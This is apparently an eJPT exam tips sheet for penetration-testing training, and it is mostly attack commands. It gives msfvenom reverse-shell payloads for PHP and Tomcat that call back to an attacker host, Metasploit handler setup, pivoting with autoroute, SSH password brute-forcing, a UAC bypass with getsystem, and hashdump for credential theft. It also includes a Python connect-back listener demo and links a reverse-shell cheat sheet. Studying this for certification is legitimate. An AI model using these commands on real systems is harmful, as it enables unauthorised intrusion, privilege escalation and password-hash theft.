eJPT Exam Tips and Solution

Reverse Connection & Exploitation

Netcat

Basic Netcat listener (run on the attacker machine; the target then connects back to this port)

nc -lnvp <port>
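What `nc -lnvp <port>` actually does is bind a TCP port and wait for the target to connect back, then relay whatever the target sends. The script below is an added example (not from the original page) that reimplements that listener in Python and pairs it with a constructed stand-in for the target, which connects back and sends the output of one command. The loopback address, port 0 (ask the OS for a free port) and the `echo connected` command are assumptions for the demo; a real reverse shell would attach `/bin/sh` to the socket instead of sending a single line.

```python
"""Minimal reverse-connection listener (what `nc -lnvp <port>` does).

Added example, not code from the original page.  The "target" side is a
constructed stand-in that connects back to LHOST:LPORT and sends the output
of one command; a real reverse shell would wire a shell's stdin/stdout to the
socket instead.
"""
import socket
import subprocess
import threading


def start_listener(host="127.0.0.1", port=0):
    """Bind a TCP listener. Assumption: loopback only; port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def handle_one(srv, timeout=5.0):
    """Accept a single connect-back and return (peer_ip, first line received).

    Recording the peer matters on an engagement: it tells you which host
    actually called back when several payloads are in flight.
    """
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    with conn:
        data = b""
        while not data.endswith(b"\n"):
            chunk = conn.recv(4096)
            if not chunk:          # peer closed before sending a full line
                break
            data += chunk
    return peer[0], data.decode(errors="replace").rstrip("\n")


def fake_target(lhost, lport, command):
    """Constructed stand-in for the victim: run one command, connect back, send its output."""
    out = subprocess.run(command, shell=True, capture_output=True, text=True).stdout
    with socket.create_connection((lhost, lport)) as s:
        s.sendall(out.strip().encode() + b"\n")


def demo(command="echo connected"):
    """Attacker and target in one process: returns (peer_ip, line the listener received)."""
    srv = start_listener()
    lhost, lport = srv.getsockname()
    t = threading.Thread(target=fake_target, args=(lhost, lport, command))
    t.start()
    try:
        return handle_one(srv)
    finally:
        t.join()
        srv.close()


if __name__ == "__main__":
    print(demo())
```

Note the direction of the connection: the listener never reaches out to the target, so it works even when the target is behind NAT or an inbound firewall, which is why reverse shells are preferred over bind shells in practice.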

Metasploit

Generate a PHP reverse shell [msfvenom]

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -o meterpreter.php

Start a handler for it. The handler payload must be exactly the one used in msfvenom (here the stageless php/meterpreter_reverse_tcp), otherwise the incoming connection is not recognised:

$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.1
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

Add a route through a Meterpreter session (pivoting)

Run this from inside the Meterpreter session that sits on the internal network; Metasploit modules will then reach 172.16.50.0/24 through that session:

meterpreter > run autoroute -s 172.16.50.0/24

SSH bruteforce in msfconsole (works through the pivot route added above)

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.pwd
set verbose true
run

View active sessions

sessions

Interact with a session

sessions -i <number>

Send the current Meterpreter session to the background (it stays open and gets a session number)

meterpreter > background

Note that on modern Windows versions, User Account Control (UAC) means that even an administrative user's process normally runs at medium integrity, so getsystem fails from such a session:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

Bypassing UAC

You can get around that restriction with the bypassuac module. It needs an existing session whose user is a member of the local Administrators group, and it only works on the Windows versions the module targets (check the module description and show targets).

meterpreter > background
[*] Backgrounding session 1...

msf exploit(multi/handler) > search bypassuac

msf exploit(multi/handler) > use exploit/windows/local/bypassuac

# Configuring the module

msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

# Escalating in the new session

The new session runs at high integrity (UAC no longer restricts it), so getsystem now works:

meterpreter > getuid
Server username: els\els
meterpreter > getsystem
...got system (via technique 1)

Dumping the Password Database

With SYSTEM privileges you can dump the local password database and save the hashes for an offline cracking session (or reuse them directly in pass-the-hash attacks). The hashdump command prints the LM/NTLM hashes of the local accounts:

meterpreter > hashdump

msfvenom

Generate a .war file for an Apache Tomcat reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.64.10 LPORT=4444 -f war > reverse.war

Deploy reverse.war through the Tomcat Manager application, start a multi/handler with the same payload (java/jsp_shell_reverse_tcp) and LHOST/LPORT, then request the deployed application's URL to trigger the connection back.

Collection of Reverse shell [Commands]

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

Last updated 1 year ago